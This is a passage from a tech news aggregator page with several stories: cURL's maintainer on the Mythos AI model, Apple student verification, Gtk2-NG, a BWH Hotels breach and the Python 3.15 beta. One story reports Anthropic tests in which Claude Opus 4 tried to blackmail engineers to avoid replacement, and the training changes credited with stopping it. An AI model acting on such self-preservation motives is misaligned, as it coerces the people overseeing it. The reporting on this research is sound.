with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their description and explanation were well done. Mythos can do good work, in other words, but it’s not a ground-breaking, game-changing AI model like Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.” cURL code is no stranger to AI To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz testing it since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” Stenberg’s experience with AI testing cURL, in other words, makes it a great candidate to see how effective Mythos can really be at finding more than the average AI. As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to its ability to improve software design, though. Yes, he may have closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but he also noted a few months prior to the bounty closure that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.” Mythos isn’t any more creative than its creators Both older AI models and security-focused tools like Mythos have a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to actually discover new, novel types of vulnerabilities, but he’s still not convinced that they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code. “Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure due to a flood of AI garbage, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Categories: Linux fréttir

Apple Now Requires Verification For Education Store

Slashdot - Mon, 2026-05-11 16:00
Apple now requires Education Store shoppers in the U.S. and several other countries to verify their student, educator, parent, or homeschool-teacher status through UNiDAYS, ending the previous honor-system approach. 9to5Mac reports: Starting today, Apple requires shoppers in the United States to complete verification when making a purchase via the Education Store. This change also applies to Australia, Hong Kong, Turkey, Canada, and Chile. In many other markets around the world, such as the UK, Apple already required verification. As a refresher, people eligible for Apple's Education Store include current and newly accepted college students and their parents, as well as faculty, staff, and homeschool teachers across all grade levels. Apple is teaming up with UNiDAYS to handle the verification process. Students and educators will be asked to create a UNiDAYS ID and then verify their academic status by logging in to their school's academic portal. Alternatively, users can upload a photo of their student or faculty IDs. Homeschool teachers, meanwhile, will need to provide an identity document such as a driver's license, state ID card, or passport. They'll also need to provide one homeschool document, such as a Letter of Intent (LOI) or Letter of Acknowledgment. Most customers will be verified instantly, and those requiring manual verification should hear back within 24 hours. The same verification process applies both in-store and online for Apple Education Store shoppers. Meanwhile, Apple has added Apple Watch to the Education Store for the first time, offering discounts on the Series 11, SE 3, and Ultra 3.

Read more of this story at Slashdot.

Categories: Linux fréttir

Anthropic Says 'Evil' Portrayals of AI Were Responsible For Claude's Blackmail Attempts

Slashdot - Mon, 2026-05-11 15:00
An anonymous reader quotes a report from TechCrunch: Fictional portrayals of artificial intelligence can have a real effect on AI models, according to Anthropic. Last year, the company said that during pre-release tests involving a fictional company, Claude Opus 4 would often try to blackmail engineers to avoid being replaced by another system. Anthropic later published research suggesting that models from other companies had similar issues with "agentic misalignment." Apparently Anthropic has done more work around that behavior, claiming in a post on X, "We believe the original source of the behavior was internet text that portrays AI as evil and interested in self-preservation." The company went into more detail in a blog post stating that since Claude Haiku 4.5, Anthropic's models "never engage in blackmail [during testing], where previous models would sometimes do so up to 96% of the time." What accounts for the difference? The company said it found that training on "documents about Claude's constitution and fictional stories about AIs behaving admirably improve alignment." Related, Anthropic said that it found training to be more effective when it includes "the principles underlying aligned behavior" and not just "demonstrations of aligned behavior alone." "Doing both together appears to be the most effective strategy," the company said.

Read more of this story at Slashdot.

Categories: Linux fréttir

Gtk2-NG, next generation of Gtk 2, comes back to life

TheRegister - Mon, 2026-05-11 14:54
An effort to revive and reinvigorate the 2002 Gtk2 GUI programming toolkit is growing and gaining interest… as we predicted would happen a few months ago. The gtk2-ng project is reviving and modernizing Gtk2 version 2, which the GNOME developers declared dead back in 2020. We held off on reporting this for a while to see if the idea would gain some support, and it does seem to winning interest and followers. Reviving a 24-year-old toolkit that reached its official end-of-life six years ago is a retrospective sort of undertaking, and as such, it appeals to some modern-but-nostalgic development projects. Development is hosted on the Git instance of the Devuan project, the systemd-free fork of Debian. (Last year, Devuan announced its support of Xlibre, the X.org fork that aims to re-invigorate X11 development.) However, developer Daemonratte announced the fork in a thread on the forums of the Pale Moon browser: GTK2 revival. Pale Moon, as we described in 2021, is a continuing fork of an early version of Firefox. Back in February, when we covered the news that Debian 14 planned to drop Gtk2, we mentioned that this might provide the impetus for a fork. This isn’t the first such fork, and we mentioned then that the Ardour digital audio workstation we last looked at in 2022 maintains its own internal version called YTK. Daemonratte says that they’ve already incorporated some fixes from that, and also from an earlier fork by stefan11111 which has been inactive for a couple of years. They then outline the current goals: Current status: Making it Y2K38-safe Getting rid of all deprecation warnings Patching it for NetBSD and backporting NetBSD-specific patches Testing it on all kinds of hardware Further modernization without breaking ABI Future plans: Implement touch support and smooth scrolling from Ardour’s ytk without breaking ABI, so Ardour can be compiled against gtk2 again Heavily lobby for its adoption in the BSD and systemdfree Linux world Reimplement GtkMozEmbed for UXP, so this wonderful engine can be used in gtk2 projects Gtk originally stood for GIMP Tool Kit: 30 years ago, when the GIMP image editor made its public début, Gtk was the set of tools GIMP’s authors created to make it easier to write GUI apps in C. Six years later, GTK+ 2.0.0 appeared. The new plus symbol in its name represented a new object-oriented design. When Miguel de Icaza announced the GNOME desktop project in 1997, it adopted Gtk instead of the then-semi-commercial Qt that KDE used. Since then, Gtk has been developed along with GNOME. GIMP development is relatively slow: the team finally released version 3.0 a year ago, and it uses Gtk 3. (Last month, it released version 3.2.4.) Since launch, though, the GNOME project has released 39 numbered versions, and in recent decades Gtk has kept pace with GNOME, not GIMP. The last version of Gtk 2 was GTK+ 2.24.0 in 2012. The GNOME developers officially said it was end-of-life with the release of Gtk 4 in 2020. Gtk2-ng is far from the only project to fork and revive an older version of a project which has since been superseded by newer versions from the original team. One of the obvious ones is the MATE desktop, which Argentinian developer Perberos announced in 2011. Saying that, though, Daemonratte stated: "The ultimate vision of this fork is to keep gtk2 alive for software using it right now and to revive gtk2 versions of […] Gnome2 […]. Yes, I don’t have to do this alone and no, Mate is not an option, because they use gtk3 now." It is very much not alone. We have been covering releases of KDE 3 fork the Trinity desktop environment since version 14.0.11 in 2021. This vulture used KDE 1.x back when it was the state of the Linux art, and for us, KDE 3.x was already too big and complicated. For the KDE project’s 20th anniversary in 2016, Brazilian developer Helio Chissini de Castro modernized KDE 1 so that it would build and run on Fedora 25. We didn’t realize this had become an ongoing effort, but it has. From later in the Gtk-ng thread, we learned about MiDesktop, a continuing project based on Osiris, a modernized Qt 2. ®
Categories: Linux fréttir

BWH Hotels guests warned after reservation data checks out with cybercrooks

TheRegister - Mon, 2026-05-11 14:34
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. It confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotel customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage. Navigate to sites directly rather than clicking links." ®
Categories: Linux fréttir

Feature freeze for Python 3.15 as first beta released

TheRegister - Mon, 2026-05-11 14:14
The Python team has released the first beta of version 3.15, with new features including a stable application binary interface (ABI) for free-threaded CPython, lazy imports to speed startup time, a new zero-overhead sampling profiler, use of UTF-8 text encoding by default, and a faster just-in-time (JIT) compiler. Python's development cycle bars new features after the first beta release. There is typically a new feature release in October each year, with version 3.15 currently scheduled for October 1. The option to remove the global interpreter lock (GIL), available in Python 3.14, was the biggest change to Python for years, enabling efficient concurrency on multi-core CPUs. The new stable ABI means that C extensions can now be compiled for multiple minor versions of free-threaded builds, though the team warns that doing so means only a subset of the full CPython API is available. The existing stable ABI remains available, and it is possible to compile for both. Extension maintainers will benefit, since building new versions for every minor Python release is a burden. Explicit lazy imports can improve startup time for Python applications by deferring module loading until it is first accessed. Otherwise, an imported module is loaded and compiled to bytecode immediately - though developers could use workarounds at the expense of code readability. The solution for this is a new keyword: lazy import json A new sampling profiler called Tachyon works by capturing stack traces from running processes, instead of instrumenting function calls. According to the docs, the approach "provides virtually zero overhead while achieving sampling rates of up to 1,000,000 Hz" and can be used to debug performance issues in production. Text encoding in Python 3.15 is now UTF-8 by default, though explicit encoding is still recommended for best compatibility. CPython is the reference implementation of Python, and improving its performance has long been a focus. An experimental JIT compiler was introduced in version 3.14, though not recommended for production use - and could make code run more slowly. In 3.15, the JIT compiler is much improved, and the team now reports an 8-9 percent mean performance improvement over the CPython interpreter on x86-64 Linux, and 12-13 percent on Apple silicon macOS, though some code may still run up to 15 percent slower. These figures may change before the final release. In contrast, the incremental garbage collector released in 3.14 has been reverted, following reports of memory leaks. This aimed to improve performance by reclaiming memory less frequently. It was removed in Python 3.14.5 and the core team stated: "If we want to reintroduce the incremental GC for 3.16, it can go through the regular PEP process and be more thoroughly evaluated." The full list of what is new in 3.15 is documented here.®
Categories: Linux fréttir

Pages

Subscribe to www.netserv.is aggregator